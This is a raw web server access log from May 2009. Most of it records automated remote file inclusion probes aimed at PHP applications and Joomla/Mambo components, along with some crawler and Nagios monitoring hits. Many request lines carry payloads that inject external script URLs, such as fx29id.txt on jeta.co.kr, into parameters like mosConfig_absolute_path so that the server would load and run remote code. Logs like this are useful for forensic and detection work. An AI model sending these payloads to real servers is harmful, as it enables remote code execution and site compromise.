200.107.138.34 - - [17/May/2009:03:52:25 -0400] "GET /index.php?lg=http://80.24.176.145/time//appserv/file.txt???? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
110.45.145.92 - - [17/May/2009:03:52:59 -0400] "GET /logs/access_log.Q108082800//include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
221.139.104.104 - - [17/May/2009:03:53:04 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 200 453 "-" "libwww-perl/5.805"
66.225.211.159 - - [17/May/2009:03:53:30 -0400] "GET /errors.php?error=http://www.contascatti.com/inc/idp8.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.820"
66.225.211.159 - - [17/May/2009:03:53:30 -0400] "GET /logs/errors.php?error=http://www.contascatti.com/inc/idp8.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.820"
66.225.211.159 - - [17/May/2009:03:53:30 -0400] "GET /logs/error_log.Q109050400/errors.php?error=http://www.contascatti.com/inc/idp8.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.820"
123.143.98.5 - - [17/May/2009:03:54:12 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:03:54:12 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:03:54:12 -0400] "GET /logs/access_log.Q108090200//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.225.211.159 - - [17/May/2009:03:54:17 -0400] "GET /logs/access_log.Q108090500/errors.php?error=http://www.contascatti.com/inc/idp8.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.820"
66.225.211.159 - - [17/May/2009:03:54:17 -0400] "GET /logs/access_log.Q108090100/errors.php?error=http://www.contascatti.com/inc/idp8.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.820"
66.225.211.159 - - [17/May/2009:03:54:18 -0400] "GET /logs/access_log.Q108082900/errors.php?error=http://www.contascatti.com/inc/idp8.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.820"
200.107.138.34 - - [17/May/2009:03:54:23 -0400] "GET /logs/access_log.Q108121100/index.php?lg=http://80.24.176.145/time//appserv/file.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
66.225.211.159 - - [17/May/2009:03:54:24 -0400] "GET /logs/access_log.Q108111500/errors.php?error=http://www.contascatti.com/inc/idp8.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.820"
121.254.229.131 - - [17/May/2009:03:55:42 -0400] "GET //include/footer.php?_path[counter]=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
121.254.229.131 - - [17/May/2009:03:55:42 -0400] "GET /logs//include/footer.php?_path[counter]=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
121.254.229.131 - - [17/May/2009:03:55:42 -0400] "GET /logs/access_log.Q109020600%20%20//include/footer.php?_path[counter]=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
217.13.127.95 - - [17/May/2009:03:55:49 -0400] "GET //include/footer.php?_path[counter]=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
217.13.127.95 - - [17/May/2009:03:55:49 -0400] "GET /logs//include/footer.php?_path[counter]=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
217.13.127.95 - - [17/May/2009:03:55:49 -0400] "GET /logs/access_log.Q109020600%20%20//include/footer.php?_path[counter]=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
217.13.127.95 - - [17/May/2009:03:55:52 -0400] "GET //include/footer.php?_path[counter]=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
217.13.127.95 - - [17/May/2009:03:55:55 -0400] "GET /logs//include/footer.php?_path[counter]=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
217.13.127.95 - - [17/May/2009:03:55:55 -0400] "GET /logs/access_log.Q109020600%20%20//include/footer.php?_path[counter]=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:03:55:57 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:03:55:57 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:03:55:57 -0400] "GET /logs/access_log.Q108090200//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.254.229.131 - - [17/May/2009:03:56:06 -0400] "GET /logs/access_log.Q109020600//include/footer.php?_path[counter]=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:03:56:29 -0400] "GET /logs/access_log.Q108070500//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:03:56:30 -0400] "GET /logs/access_log.Q108070500//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.153.212.195 - - [17/May/2009:03:56:41 -0400] "GET /logs/access_log.Q108082500%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:03:57:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
110.45.145.92 - - [17/May/2009:03:57:45 -0400] "GET /logs/access_log.Q108102400//include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
70.86.169.162 - - [17/May/2009:03:57:57 -0400] "GET /logs//skysilver/login.tpl.php?theme=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
70.86.169.162 - - [17/May/2009:03:57:57 -0400] "GET /logs/error_log.Q109020500//skysilver/login.tpl.php?theme=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
70.86.169.162 - - [17/May/2009:03:57:57 -0400] "GET //skysilver/login.tpl.php?theme=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 222 "-" "libwww-perl/5.79"
122.153.212.195 - - [17/May/2009:03:58:21 -0400] "GET /logs/access_log.Q108082900%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
110.45.145.92 - - [17/May/2009:03:58:49 -0400] "GET /logs/access_log.Q108052400//include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
222.236.44.45 - - [17/May/2009:03:59:30 -0400] "GET /logs/access_log.Q109051200/skin/zero_vote/login.php?dir=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.63"
222.236.44.45 - - [17/May/2009:03:59:30 -0400] "GET /skin/zero_vote/login.php?dir=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.63"
222.236.44.45 - - [17/May/2009:03:59:31 -0400] "GET /logs/skin/zero_vote/login.php?dir=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.63"
87.106.38.176 - - [17/May/2009:03:59:54 -0400] "GET /logs/access_log.Q108090900//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://aaaaa2.altervista.org/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
87.106.38.176 - - [17/May/2009:03:59:55 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://aaaaa2.altervista.org/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
87.106.38.176 - - [17/May/2009:03:59:55 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://aaaaa2.altervista.org/id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
124.0.55.34 - - [17/May/2009:04:00:13 -0400] "GET /logs/access_log.Q108082000//include.php?path[docroot]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.0.55.34 - - [17/May/2009:04:00:13 -0400] "GET /logs//include.php?path[docroot]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
124.0.55.34 - - [17/May/2009:04:00:13 -0400] "GET //include.php?path[docroot]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
124.0.55.34 - - [17/May/2009:04:00:15 -0400] "GET /logs/access_log.Q108122500//include.php?path[docroot]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:00:20 -0400] "GET /logs/access_log.Q108090200%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.30.79.49 - - [17/May/2009:04:00:04 -0400] "GET /logs/access_log.Q109051500 HTTP/1.0" 200 6117848 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
123.143.98.5 - - [17/May/2009:04:02:04 -0400] "GET /logs/access_log.Q108090200%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:02:25 -0400] "GET /logs/access_log.Q108070500%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:02:27 -0400] "GET /logs/access_log.Q108070500%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.13.127.95 - - [17/May/2009:04:02:28 -0400] "GET /logs/access_log.Q109020600//include/footer.php?_path[counter]=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
220.181.7.97 - - [17/May/2009:04:02:29 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
221.139.104.104 - - [17/May/2009:04:02:36 -0400] "GET /logs/access_log.Q108122500//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
221.139.104.104 - - [17/May/2009:04:02:36 -0400] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
221.139.104.104 - - [17/May/2009:04:02:36 -0400] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
217.13.127.95 - - [17/May/2009:04:02:43 -0400] "GET /logs/access_log.Q109020600//include/footer.php?_path[counter]=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:04:02:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.125.64.38 - - [17/May/2009:04:02:56 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
87.106.38.176 - - [17/May/2009:04:03:05 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://aaaaa2.altervista.org/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
124.0.55.34 - - [17/May/2009:04:03:08 -0400] "GET /logs/access_log.Q108082000%20%20//include.php?path[docroot]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
124.0.55.34 - - [17/May/2009:04:03:08 -0400] "GET /logs/access_log.Q108122500%20%20//include.php?path[docroot]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
87.106.38.176 - - [17/May/2009:04:03:29 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://aaaaa2.altervista.org/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
222.236.44.45 - - [17/May/2009:04:03:34 -0400] "GET /skin/zero_vote/login.php?dir=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.63"
72.30.79.49 - - [17/May/2009:04:03:43 -0400] "GET /logs/error_log.Q107092900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
123.143.98.5 - - [17/May/2009:04:05:23 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.236.44.45 - - [17/May/2009:04:06:08 -0400] "GET /logs/access_log.Q108072300/skin/zero_vote/login.php?dir=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.63"
208.80.195.34 - - [17/May/2009:04:06:51 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; PeoplePal 3.0; IEMB3; .NET CLR 2.0.50727; IEMB3)"
209.59.12.99 - - [17/May/2009:04:07:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.143.98.5 - - [17/May/2009:04:08:03 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:08:03 -0400] "GET /logs/access_log.Q109022600//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:08:04 -0400] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:08:10 -0400] "GET /logs/access_log.Q109022600//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:08:10 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:08:10 -0400] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:09:02 -0400] "GET /logs/access_log.Q109050800//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:09:11 -0400] "GET /logs/access_log.Q109050800//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.107.138.34 - - [17/May/2009:04:10:56 -0400] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://80.24.176.145/time//appserv/file.txt???? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
200.107.138.34 - - [17/May/2009:04:10:56 -0400] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://80.24.176.145/time//appserv/file.txt???? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
200.107.138.34 - - [17/May/2009:04:10:56 -0400] "GET /logs/access_log.Q108112400/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://80.24.176.145/time//appserv/file.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
200.107.138.34 - - [17/May/2009:04:10:57 -0400] "GET /logs/access_log.Q109022600/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://80.24.176.145/time//appserv/file.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
209.59.12.99 - - [17/May/2009:04:12:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.98.59.178 - - [17/May/2009:04:13:16 -0400] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
65.98.59.178 - - [17/May/2009:04:13:16 -0400] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
65.98.59.178 - - [17/May/2009:04:13:16 -0400] "GET /logs/access_log.Q108071500%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
65.98.59.178 - - [17/May/2009:04:13:32 -0400] "GET /logs/access_log.Q108061000%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
124.0.55.34 - - [17/May/2009:04:14:07 -0400] "GET /logs/access_log.Q108082800//include.php?path[docroot]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.122.26.5 - - [17/May/2009:04:14:51 -0400] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
222.122.26.5 - - [17/May/2009:04:14:51 -0400] "GET /logs/access_log.Q108071500//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
222.122.26.5 - - [17/May/2009:04:14:51 -0400] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
65.98.59.178 - - [17/May/2009:04:14:58 -0400] "GET //skin/zero_vote/error.php?dir=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
65.98.59.178 - - [17/May/2009:04:14:58 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
65.98.59.178 - - [17/May/2009:04:14:58 -0400] "GET /logs/access_log.Q108100900%20%20//skin/zero_vote/error.php?dir=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
222.122.26.5 - - [17/May/2009:04:15:02 -0400] "GET /logs/access_log.Q108061000//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
200.107.138.34 - - [17/May/2009:04:15:08 -0400] "GET /logs/access_log.Q108112400%20/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://80.24.176.145/time//appserv/file.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
65.98.59.178 - - [17/May/2009:04:16:00 -0400] "GET /logs/access_log.Q108071500//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
65.98.59.178 - - [17/May/2009:04:16:17 -0400] "GET /logs/access_log.Q108061000//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
222.122.26.5 - - [17/May/2009:04:16:43 -0400] "GET /logs/access_log.Q108071500%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
72.30.79.49 - - [17/May/2009:04:17:05 -0400] "GET /logs/error_log.Q107100300 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.122.26.5 - - [17/May/2009:04:17:16 -0400] "GET /logs/access_log.Q108061000%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
203.211.145.195 - - [17/May/2009:04:17:24 -0400] "GET /phplive/setup/header.php?css_path=http://dmgxp.com/c? HTTP/1.1" 404 222 "-" "libwww-perl/5.811"
209.59.12.99 - - [17/May/2009:04:17:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.79.49 - - [17/May/2009:04:17:59 -0400] "GET /logs/access_log.Q108080300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
123.143.98.5 - - [17/May/2009:04:21:49 -0400] "GET /logs/access_log.Q109022600%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:21:53 -0400] "GET /logs/access_log.Q109022600%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:22:02 -0400] "GET /logs/access_log.Q109050800%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:22:03 -0400] "GET /logs/access_log.Q109050800%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:04:22:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
207.58.185.62 - - [17/May/2009:04:23:16 -0400] "GET /phplive/setup/header.php?css_path=http://dmgxp.com/c? HTTP/1.1" 404 222 "-" "libwww-perl/5.65"
66.249.72.114 - - [17/May/2009:04:24:05 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L6074E03D2B7896003EE901C+WSEQ(S0060):1+OUITEM(A0200):04948002 HTTP/1.1" 200 27013 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.93.147.154 - - [17/May/2009:04:25:30 -0400] "GET /logs//include/lib.inc.php?site_path=http://www.webfo.biz/unix/test.txt?? HTTP/1.1" 404 223 "-" "Mozilla/4.61 [en] (OS/2; U)"
200.93.147.154 - - [17/May/2009:04:25:30 -0400] "GET //include/lib.inc.php?site_path=http://www.webfo.biz/unix/test.txt?? HTTP/1.1" 404 218 "-" "Mozilla/4.61 [en] (OS/2; U)"
66.249.72.114 - - [17/May/2009:04:25:41 -0400] "GET /logs/error_log.Q108012200 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [17/May/2009:04:27:52 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.149.244.80 - - [17/May/2009:04:29:24 -0400] "GET /logs/access_log.Q109022600 HTTP/1.1" 404 224 "http://www.google.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)"
89.149.244.80 - - [17/May/2009:04:29:24 -0400] "GET /logs/error_log.Q108111900 HTTP/1.1" 404 223 "http://www.google.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)"
89.149.244.80 - - [17/May/2009:04:29:24 -0400] "GET /logs/error_log.Q108073100 HTTP/1.1" 404 223 "http://www.google.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)"
89.149.244.80 - - [17/May/2009:04:29:24 -0400] "GET /logs/error_log.Q109031900 HTTP/1.1" 404 223 "http://www.google.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)"
89.149.244.80 - - [17/May/2009:04:29:24 -0400] "GET /logs/access_log.Q108111700 HTTP/1.1" 404 224 "http://www.google.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)"
89.149.244.80 - - [17/May/2009:04:29:24 -0400] "GET /logs/error_log.Q108060100 HTTP/1.1" 404 223 "http://www.google.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)"
89.149.244.80 - - [17/May/2009:04:29:24 -0400] "GET /logs/error_log.Q108072300 HTTP/1.1" 404 223 "http://www.google.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)"
89.149.244.80 - - [17/May/2009:04:29:24 -0400] "GET /logs/error_log.Q108060500 HTTP/1.1" 404 223 "http://www.google.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)"
89.149.244.80 - - [17/May/2009:04:29:24 -0400] "GET /logs/access_log.Q109020600 HTTP/1.1" 404 224 "http://www.google.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)"
89.149.244.80 - - [17/May/2009:04:29:24 -0400] "GET /logs/access_log.Q108082400 HTTP/1.1" 404 224 "http://www.google.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)"
89.149.244.80 - - [17/May/2009:04:29:24 -0400] "GET /logs/access_log.Q109050900 HTTP/1.1" 200 3163151 "http://www.google.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)"
